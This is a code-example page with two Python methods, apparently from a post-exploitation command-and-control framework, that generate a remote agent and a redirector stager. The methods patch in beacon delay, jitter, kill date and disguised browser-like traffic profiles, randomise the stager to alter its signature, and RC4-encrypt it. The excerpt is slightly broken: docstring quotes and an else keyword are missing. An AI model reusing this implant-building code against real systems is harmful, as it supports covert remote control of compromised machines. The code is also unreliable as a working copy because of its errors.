コード例 #1
    def generate_agent(self, delay, jitter, profile, killDate, workingHours, lostLimit):
        Generate "standard API" functionality, i.e. the actual agent.py that runs.

        This should always be sent over encrypted comms.

        f = open(self.installPath + "./data/agent/agent.py")
        code = f.read()

        # strip out comments and blank lines
        code = helpers.strip_python_comments(code)

        b64DefaultPage = base64.b64encode(http.default_page())

        # patch in the delay, jitter, lost limit, and comms profile
        code = code.replace('delay = 60', 'delay = %s' % (delay))
        code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
        code = code.replace('profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
        code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
        code = code.replace('defaultPage = base64.b64decode("")', 'defaultPage = base64.b64decode("%s")' % (b64DefaultPage))

        # patch in the killDate and workingHours if they're specified
        if killDate != "":
            code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
        if workingHours != "":
            code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))

        return code
コード例 #2
    def generate_stager_hop(self, server, key, profile, encrypt=True, encode=True):
        Generate the Python stager for hop.php redirectors that
        will perform key negotiation with the server and kick off the agent.

        # read in the stager base
        f = open(self.installPath + "./data/agent/stager_hop.py")
        stager = f.read()

        stager = helpers.strip_python_comments(stager)

        # first line of randomized text to change up the ending RC4 string
        randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
        stager = randomHeader + stager

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        stager = stager.replace("REPLACE_PROFILE", profile)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        # # base64 encode the stager and return it
        # if encode:
        #     return ""
        if encrypt:
            # return an encrypted version of the stager ("normal" staging)
            # return encryption.xor_encrypt(stager, key)
            return encryption.rc4(key, stager)
            # otherwise return the case-randomized stager
            return stager